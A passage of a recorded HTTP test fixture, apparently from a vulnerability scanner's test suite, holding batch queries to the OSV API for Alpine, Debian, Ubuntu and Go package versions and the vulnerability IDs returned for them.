"version": "2:8.39-12ubuntu0.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/folder_of_supported_sbom_with_only_unimportant#01 url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 97 body: | { "results": [ { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": "2026-01-20T16:49:00.053545Z" } ] } ] } headers: Content-Length: - "97" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 23023 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.12-r1" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.10-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Ubuntu", "name": "pcre3" }, "version": "2:8.39-12ubuntu0.1" }, { "package": { "ecosystem": "Debian", "name": "adduser" }, "version": "3.115" }, { "package": { "ecosystem": "Debian", "name": "apt" }, "version": "1.4.11" }, { "package": { "ecosystem": "Debian", "name": "base-files" }, "version": "9.9+deb9u13" }, { "package": { "ecosystem": "Debian", "name": "base-passwd" }, "version": "3.5.43" }, { "package": { "ecosystem": "Debian", "name": "bash" }, "version": "4.4-5" }, { "package": { "ecosystem": "Debian", "name": "bsdutils" }, "version": "1:2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "coreutils" }, "version": "8.26-3" }, { "package": { "ecosystem": "Debian", "name": "dash" }, "version": "0.5.8-2.4" }, { "package": { "ecosystem": "Debian", "name": "debconf" }, "version": "1.5.61" }, { "package": { "ecosystem": "Debian", "name": "debian-archive-keyring" }, "version": "2017.5+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "debianutils" }, "version": "4.8.1.1" }, { "package": { "ecosystem": "Debian", "name": "diffutils" }, "version": "1:3.5-3" }, { "package": { "ecosystem": "Debian", "name": "dirmngr" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Debian", "name": "dpkg" }, "version": "1.18.25" }, { "package": { "ecosystem": "Debian", "name": "e2fslibs" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "e2fsprogs" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "findutils" }, "version": "4.6.0+git+20161106-2" }, { "package": { "ecosystem": "Debian", "name": "gcc-6-base" }, "version": "6.3.0-18+deb9u1" }, { "package": { "ecosystem": "Go", "name": "github.com/opencontainers/runc" }, "version": "v1.0.1" }, { "package": { "ecosystem": "Go", "name": "github.com/tianon/gosu" }, "version": "(devel)" }, { "package": { "ecosystem": "Debian", "name": "gnupg" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Debian", "name": "gnupg-agent" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Go", "name": "golang.org/x/sys" }, "version": "v0.0.0-20210817142637-7d9622a276b7" }, { "package": { "ecosystem": "Debian", "name": "gpgv" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Debian", "name": "grep" }, "version": "2.27-2" }, { "package": { "ecosystem": "Debian", "name": "gzip" }, "version": "1.6-5+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "hostname" }, "version": "3.18+b1" }, { "package": { "ecosystem": "Debian", "name": "init-system-helpers" }, "version": "1.48" }, { "package": { "ecosystem": "Debian", "name": "libacl1" }, "version": "2.2.52-3+b1" }, { "package": { "ecosystem": "Debian", "name": "libapt-pkg5.0" }, "version": "1.4.11" }, { "package": { "ecosystem": "Debian", "name": "libassuan0" }, "version": "2.4.3-2" }, { "package": { "ecosystem": "Debian", "name": "libattr1" }, "version": "1:2.4.47-2+b2" }, { "package": { "ecosystem": "Debian", "name": "libaudit-common" }, "version": "1:2.6.7-2" }, { "package": { "ecosystem": "Debian", "name": "libaudit1" }, "version": "1:2.6.7-2" }, { "package": { "ecosystem": "Debian", "name": "libblkid1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libbsd0" }, "version": "0.8.3-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libbz2-1.0" }, "version": "1.0.6-8.1" }, { "package": { "ecosystem": "Debian", "name": "libc-bin" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libc-l10n" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libc6" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libcap-ng0" }, "version": "0.7.7-3+b1" }, { "package": { "ecosystem": "Debian", "name": "libcomerr2" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libdb5.3" }, "version": "5.3.28-12+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libdebconfclient0" }, "version": "0.227" }, { "package": { "ecosystem": "Debian", "name": "libedit2" }, "version": "3.1-20160903-3" }, { "package": { "ecosystem": "Debian", "name": "libfdisk1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libffi6" }, "version": "3.2.1-6" }, { "package": { "ecosystem": "Debian", "name": "libgcc1" }, "version": "1:6.3.0-18+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libgcrypt20" }, "version": "1.7.6-2+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libgdbm3" }, "version": "1.8.3-14" }, { "package": { "ecosystem": "Debian", "name": "libgmp10" }, "version": "2:6.1.2+dfsg-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libgnutls30" }, "version": "3.5.8-5+deb9u6" }, { "package": { "ecosystem": "Debian", "name": "libgpg-error0" }, "version": "1.26-2" }, { "package": { "ecosystem": "Debian", "name": "libgssapi-krb5-2" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libhogweed4" }, "version": "3.3-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libicu57" }, "version": "57.1-6+deb9u5" }, { "package": { "ecosystem": "Debian", "name": "libidn11" }, "version": "1.33-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libjson-perl" }, "version": "2.90-1" }, { "package": { "ecosystem": "Debian", "name": "libk5crypto3" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libkeyutils1" }, "version": "1.5.9-9" }, { "package": { "ecosystem": "Debian", "name": "libkrb5-3" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libkrb5support0" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libksba8" }, "version": "1.3.5-2" }, { "package": { "ecosystem": "Debian", "name": "libldap-2.4-2" }, "version": "2.4.44+dfsg-5+deb9u8" }, { "package": { "ecosystem": "Debian", "name": "libldap-common" }, "version": "2.4.44+dfsg-5+deb9u8" }, { "package": { "ecosystem": "Debian", "name": "libllvm6.0" }, "version": "1:6.0-1~bpo9+1" }, { "package": { "ecosystem": "Debian", "name": "liblz4-1" }, "version": "0.0~r131-2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "liblzma5" }, "version": "5.2.2-1.2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libmount1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libncurses5" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libncursesw5" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libnettle6" }, "version": "3.3-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libnpth0" }, "version": "1.3-1" }, { "package": { "ecosystem": "Debian", "name": "libnss-wrapper" }, "version": "1.1.3-1" }, { "package": { "ecosystem": "Debian", "name": "libp11-kit0" }, "version": "0.23.3-2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libpam-modules" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpam-modules-bin" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpam-runtime" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpam0g" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpcre3" }, "version": "2:8.39-3" }, { "package": { "ecosystem": "Debian", "name": "libperl5.24" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "libpq5" }, "version": "14.2-1.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "libreadline7" }, "version": "7.0-3" }, { "package": { "ecosystem": "Debian", "name": "libsasl2-2" }, "version": "2.1.27~101-g0780600+dfsg-3+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libsasl2-modules-db" }, "version": "2.1.27~101-g0780600+dfsg-3+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libselinux1" }, "version": "2.6-3+b3" }, { "package": { "ecosystem": "Debian", "name": "libsemanage-common" }, "version": "2.6-2" }, { "package": { "ecosystem": "Debian", "name": "libsemanage1" }, "version": "2.6-2" }, { "package": { "ecosystem": "Debian", "name": "libsepol1" }, "version": "2.6-2" }, { "package": { "ecosystem": "Debian", "name": "libsmartcols1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libsqlite3-0" }, "version": "3.16.2-5+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libss2" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libssl1.1" }, "version": "1.1.0l-1~deb9u5" }, { "package": { "ecosystem": "Debian", "name": "libstdc++6" }, "version": "6.3.0-18+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libsystemd0" }, "version": "232-25+deb9u13" }, { "package": { "ecosystem": "Debian", "name": "libtasn1-6" }, "version": "4.10-1.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libtinfo5" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libudev1" }, "version": "232-25+deb9u13" }, { "package": { "ecosystem": "Debian", "name": "libustr-1.0-1" }, "version": "1.0.4-6" }, { "package": { "ecosystem": "Debian", "name": "libuuid1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libxml2" }, "version": "2.9.4+dfsg1-2.2+deb9u6" }, { "package": { "ecosystem": "Debian", "name": "libxslt1.1" }, "version": "1.1.29-2.1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libzstd1" }, "version": "1.1.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "locales" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "login" }, "version": "1:4.4-4.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "lsb-base" }, "version": "9.20161125" }, { "package": { "ecosystem": "Debian", "name": "mawk" }, "version": "1.3.3-17+b3" }, { "package": { "ecosystem": "Debian", "name": "mount" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "multiarch-support" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "ncurses-base" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "ncurses-bin" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "netbase" }, "version": "5.4" }, { "package": { "ecosystem": "Debian", "name": "openssl" }, "version": "1.1.0l-1~deb9u5" }, { "package": { "ecosystem": "Debian", "name": "passwd" }, "version": "1:4.4-4.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "perl" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "perl-base" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "perl-modules-5.24" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "pgdg-keyring" }, "version": "2018.2" }, { "package": { "ecosystem": "Debian", "name": "pinentry-curses" }, "version": "1.0.0-2" }, { "package": { "ecosystem": "Debian", "name": "postgresql-11" }, "version": "11.15-1.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "postgresql-client-11" }, "version": "11.15-1.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "postgresql-client-common" }, "version": "238.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "postgresql-common" }, "version": "238.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "readline-common" }, "version": "7.0-3" }, { "package": { "ecosystem": "Debian", "name": "sed" }, "version": "4.4-1" }, { "package": { "ecosystem": "Debian", "name": "sensible-utils" }, "version": "0.0.9+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "ssl-cert" }, "version": "1.0.39" }, { "package": { "ecosystem": "Debian", "name": "sysvinit-utils" }, "version": "2.88dsf-59.9" }, { "package": { "ecosystem": "Debian", "name": "tar" }, "version": "1.29b-1.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "tzdata" }, "version": "2021a-0+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "ucf" }, "version": "3.0036" }, { "package": { "ecosystem": "Debian", "name": "util-linux" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "xz-utils" }, "version": "5.2.2-1.2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "zlib1g" }, "version": "1:1.2.8.dfsg-5+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "zstd" }, "version": "1.1.2-1+deb9u1" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.10-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/folder_of_supported_sbom_with_vulns url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 22298 body: | { "results": [ { "vulns": [ { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": "2026-01-20T16:49:00.053545Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2011-3374", "modified": "2026-03-17T02:42:42.368242Z" }, { "id": "DEBIAN-CVE-2018-0501", "modified": "2025-11-19T02:04:24.786271Z" }, { "id": "DEBIAN-CVE-2019-3462", "modified": "2025-11-19T02:02:50.288367Z" }, { "id": "DEBIAN-CVE-2020-27350", "modified": "2025-11-19T01:06:21.507844Z" }, { "id": "DEBIAN-CVE-2020-3810", "modified": "2025-11-19T01:08:53.168851Z" }, { "id": "DSA-4685-1", "modified": "2026-03-09T02:09:03.263738Z" }, { "id": "DSA-4808-1", "modified": "2026-03-09T02:11:17.119108Z" } ] }, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2019-18276", "modified": "2025-11-19T01:19:06.470662Z" }, { "id": "DEBIAN-CVE-2022-3715", "modified": "2026-03-17T02:47:45.184492Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2016-2781", "modified": "2026-03-17T02:44:35.752995Z" }, { "id": "DEBIAN-CVE-2017-18018", "modified": "2026-03-17T02:45:06.555217Z" }, { "id": "DEBIAN-CVE-2024-0684", "modified": "2025-11-19T01:02:00.374806Z" }, { "id": "DEBIAN-CVE-2025-5278", "modified": "2026-03-17T02:52:23.723753Z" } ] }, {}, {}, { "vulns": [ { "id": "DLA-3482-1", "modified": "2025-05-26T07:01:25.263124Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2022-1664", "modified": "2025-11-20T10:15:48.083782Z" }, { "id": "DEBIAN-CVE-2025-6297", "modified": "2026-03-17T02:50:41.230667Z" }, { "id": "DEBIAN-CVE-2026-2219", "modified": "2026-03-14T15:06:12.109941Z" }, { "id": "DLA-3022-1", "modified": "2026-03-09T01:23:37.553205Z" }, { "id": "DSA-5147-1", "modified": "2026-03-09T02:10:11.335992Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2019-5094", "modified": "2025-11-19T02:02:52.019166Z" }, { "id": "DEBIAN-CVE-2019-5188", "modified": "2025-11-19T01:01:51.904490Z" }, { "id": "DEBIAN-CVE-2022-1304", "modified": "2025-11-20T10:15:47.847878Z" }, { "id": "DLA-3910-1", "modified": "2026-03-09T01:22:32.343795Z" }, { "id": "DSA-4535-1", "modified": "2026-03-09T02:10:12.902574Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-9493-h29p-rfm2", "modified": "2026-02-04T03:47:55.536228Z" }, { "id": "GHSA-cgrx-mc8f-2prm", "modified": "2026-02-04T02:50:45.342760Z" }, { "id": "GHSA-f3fp-gc8g-vw66", "modified": "2026-02-04T04:15:59.735117Z" }, { "id": "GHSA-g2j6-57v7-gm8c", "modified": "2026-02-04T02:43:58.212471Z" }, { "id": "GHSA-jfvp-7x6p-h2pv", "modified": "2026-02-04T03:12:37.981869Z" }, { "id": "GHSA-m8cg-xc2p-r3fc", "modified": "2026-02-04T03:29:19.767788Z" }, { "id": "GHSA-qw9x-cqr3-wc7r", "modified": "2026-02-04T02:13:22.313241Z" }, { "id": "GHSA-v95c-p5hm-xq8f", "modified": "2026-03-13T22:16:11.684125Z" }, { "id": "GHSA-vpvm-3wq2-2wvm", "modified": "2026-02-04T02:53:37.613379Z" }, { "id": "GHSA-xr7r-f8xq-vfvv", "modified": "2026-02-04T03:18:48.377509Z" }, { "id": "GO-2022-0274", "modified": "2026-02-04T02:26:28.343240Z" }, { "id": "GO-2022-0452", "modified": "2026-02-04T03:17:02.340230Z" }, { "id": "GO-2023-1627", "modified": "2026-02-04T03:58:42.107712Z" }, { "id": "GO-2023-1682", "modified": "2026-02-04T02:59:23.815900Z" }, { "id": "GO-2023-1683", "modified": "2026-02-04T04:01:58.343687Z" }, { "id": "GO-2024-2491", "modified": "2026-02-04T02:39:00.262696Z" }, { "id": "GO-2024-3110", "modified": "2026-02-04T02:23:26.560077Z" }, { "id": "GO-2025-4096", "modified": "2026-02-04T03:11:33.546218Z" }, { "id": "GO-2025-4097", "modified": "2026-02-04T03:00:55.376695Z" }, { "id": "GO-2025-4098", "modified": "2026-02-04T02:52:46.004719Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "GHSA-p782-xgp4-8hr8", "modified": "2026-02-04T04:15:14.486111Z" }, { "id": "GO-2022-0493", "modified": "2026-02-04T03:42:54.589715Z" } ] }, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2022-1271", "modified": "2025-11-20T10:15:47.940295Z" }, { "id": "DSA-5122-1", "modified": "2026-03-09T02:09:10.163691Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2017-0379", "modified": "2025-11-19T01:06:25.120079Z" }, { "id": "DEBIAN-CVE-2017-7526", "modified": "2025-11-19T02:04:40.318681Z" }, { "id": "DEBIAN-CVE-2018-0495", "modified": "2025-11-19T02:04:27.207183Z" }, { "id": "DEBIAN-CVE-2018-6829", "modified": "2026-03-10T05:05:47.263837Z" }, { "id": "DEBIAN-CVE-2019-13627", "modified": "2025-11-19T01:12:35.581705Z" }, { "id": "DEBIAN-CVE-2021-33560", "modified": "2026-03-10T05:07:08.938163Z" }, { "id": "DEBIAN-CVE-2021-40528", "modified": "2025-11-19T01:01:59.995618Z" }, { "id": "DEBIAN-CVE-2024-2236", "modified": "2026-03-10T05:09:58.705229Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2017-10790", "modified": "2025-11-19T01:01:57.855157Z" }, { "id": "DEBIAN-CVE-2018-1000654", "modified": "2025-11-19T02:02:40.642360Z" }, { "id": "DEBIAN-CVE-2018-6003", "modified": "2025-11-19T01:06:22.990063Z" }, { "id": "DEBIAN-CVE-2021-46848", "modified": "2025-11-20T10:15:14.681077Z" }, { "id": "DEBIAN-CVE-2024-12133", "modified": "2025-11-20T10:17:02.620233Z" }, { "id": "DEBIAN-CVE-2025-13151", "modified": "2026-01-20T05:13:20.502324Z" }, { "id": "DLA-3263-1", "modified": "2026-03-09T01:22:34.273046Z" }, { "id": "DLA-4061-1", "modified": "2026-03-09T01:20:16.124977Z" }, { "id": "DSA-5863-1", "modified": "2026-03-09T02:08:50.747280Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2016-3709", "modified": "2025-11-20T10:12:11.931996Z" }, { "id": "DEBIAN-CVE-2016-9318", "modified": "2025-11-19T02:02:45.582059Z" }, { "id": "DEBIAN-CVE-2017-0663", "modified": "2025-11-19T02:02:52.056836Z" }, { "id": "DEBIAN-CVE-2017-15412", "modified": "2025-11-19T01:08:49.499099Z" }, { "id": "DEBIAN-CVE-2017-16931", "modified": "2025-11-19T02:04:25.542166Z" }, { "id": "DEBIAN-CVE-2017-16932", "modified": "2025-11-19T01:04:39.458229Z" }, { "id": "DEBIAN-CVE-2017-18258", "modified": "2025-11-19T01:08:48.927062Z" }, { "id": "DEBIAN-CVE-2017-5130", "modified": "2025-11-19T01:03:12.822124Z" }, { "id": "DEBIAN-CVE-2017-5969", "modified": "2025-11-19T01:08:52.062516Z" }, { "id": "DEBIAN-CVE-2017-7375", "modified": "2025-11-19T02:02:48.011785Z" }, { "id": "DEBIAN-CVE-2017-7376", "modified": "2025-11-19T02:01:17.016443Z" }, { "id": "DEBIAN-CVE-2017-8872", "modified": "2025-11-19T02:04:31.920669Z" }, { "id": "DEBIAN-CVE-2017-9047", "modified": "2025-11-19T02:04:30.335407Z" }, { "id": "DEBIAN-CVE-2017-9048", "modified": "2025-11-19T01:19:09.303210Z" }, { "id": "DEBIAN-CVE-2017-9049", "modified": "2025-11-19T01:03:12.259406Z" }, { "id": "DEBIAN-CVE-2017-9050", "modified": "2025-11-19T01:08:53.069573Z" }, { "id": "DEBIAN-CVE-2018-14404", "modified": "2025-11-19T01:12:32.274520Z" }, { "id": "DEBIAN-CVE-2018-14567", "modified": "2025-11-19T01:08:49.660035Z" }, { "id": "DEBIAN-CVE-2019-19956", "modified": "2025-11-19T02:01:17.970372Z" }, { "id": "DEBIAN-CVE-2019-20388", "modified": "2025-11-19T02:04:37.363509Z" }, { "id": "DEBIAN-CVE-2020-24977", "modified": "2025-11-19T02:04:41.266003Z" }, { "id": "DEBIAN-CVE-2020-7595", "modified": "2025-11-19T02:04:29.271836Z" }, { "id": "DEBIAN-CVE-2021-3516", "modified": "2025-11-19T02:01:14.946107Z" }, { "id": "DEBIAN-CVE-2021-3517", "modified": "2025-11-19T01:12:34.981900Z" }, { "id": "DEBIAN-CVE-2021-3518", "modified": "2025-11-19T01:19:08.645337Z" }, { "id": "DEBIAN-CVE-2021-3537", "modified": "2025-11-19T02:04:30.248276Z" }, { "id": "DEBIAN-CVE-2021-3541", "modified": "2025-11-19T02:04:36.614917Z" }, { "id": "DEBIAN-CVE-2022-2309", "modified": "2025-11-20T10:15:28.694644Z" }, { "id": "DEBIAN-CVE-2022-23308", "modified": "2025-11-20T10:15:29.029152Z" }, { "id": "DEBIAN-CVE-2022-29824", "modified": "2025-11-20T10:15:52.814213Z" }, { "id": "DEBIAN-CVE-2022-40303", "modified": "2025-11-20T10:16:01.982632Z" }, { "id": "DEBIAN-CVE-2022-40304", "modified": "2025-11-20T10:16:01.918054Z" }, { "id": "DEBIAN-CVE-2022-49043", "modified": "2025-11-20T10:16:12.358770Z" }, { "id": "DEBIAN-CVE-2023-28484", "modified": "2025-11-20T10:16:35.199991Z" }, { "id": "DEBIAN-CVE-2023-29469", "modified": "2025-11-20T10:17:34.943682Z" }, { "id": "DEBIAN-CVE-2023-39615", "modified": "2025-11-20T10:16:41.593841Z" }, { "id": "DEBIAN-CVE-2023-45322", "modified": "2025-11-20T10:16:44.891362Z" }, { "id": "DEBIAN-CVE-2024-25062", "modified": "2025-11-20T10:17:04.986212Z" }, { "id": "DEBIAN-CVE-2024-34459", "modified": "2025-11-20T10:17:41.570595Z" }, { "id": "DEBIAN-CVE-2024-56171", "modified": "2025-11-20T10:17:48.605695Z" }, { "id": "DEBIAN-CVE-2025-24928", "modified": "2025-11-20T10:18:05.778161Z" }, { "id": "DEBIAN-CVE-2025-27113", "modified": "2025-11-20T10:18:06.358243Z" }, { "id": "DEBIAN-CVE-2025-32414", "modified": "2025-11-20T10:18:08.076077Z" }, { "id": "DEBIAN-CVE-2025-32415", "modified": "2025-11-20T10:18:08.251077Z" }, { "id": "DEBIAN-CVE-2025-49794", "modified": "2025-11-20T10:18:23.322205Z" }, { "id": "DEBIAN-CVE-2025-49796", "modified": "2025-11-20T10:18:23.585429Z" }, { "id": "DEBIAN-CVE-2025-6021", "modified": "2025-11-20T10:18:26.314947Z" }, { "id": "DEBIAN-CVE-2025-6170", "modified": "2025-11-20T10:18:26.670728Z" }, { "id": "DEBIAN-CVE-2025-8732", "modified": "2025-12-14T10:13:26.467517Z" }, { "id": "DEBIAN-CVE-2025-9714", "modified": "2026-01-10T14:08:12.148171Z" }, { "id": "DEBIAN-CVE-2026-0989", "modified": "2026-01-16T11:05:07.928323Z" }, { "id": "DEBIAN-CVE-2026-0990", "modified": "2026-01-16T11:05:23.527352Z" }, { "id": "DEBIAN-CVE-2026-0992", "modified": "2026-01-16T11:05:10.515041Z" }, { "id": "DEBIAN-CVE-2026-1757", "modified": "2026-02-03T11:16:44.779248Z" }, { "id": "DLA-3012-1", "modified": "2026-03-09T01:20:46.878115Z" }, { "id": "DLA-3172-1", "modified": "2026-03-09T01:19:54.747665Z" }, { "id": "DLA-3405-1", "modified": "2026-03-09T01:01:29.748040Z" }, { "id": 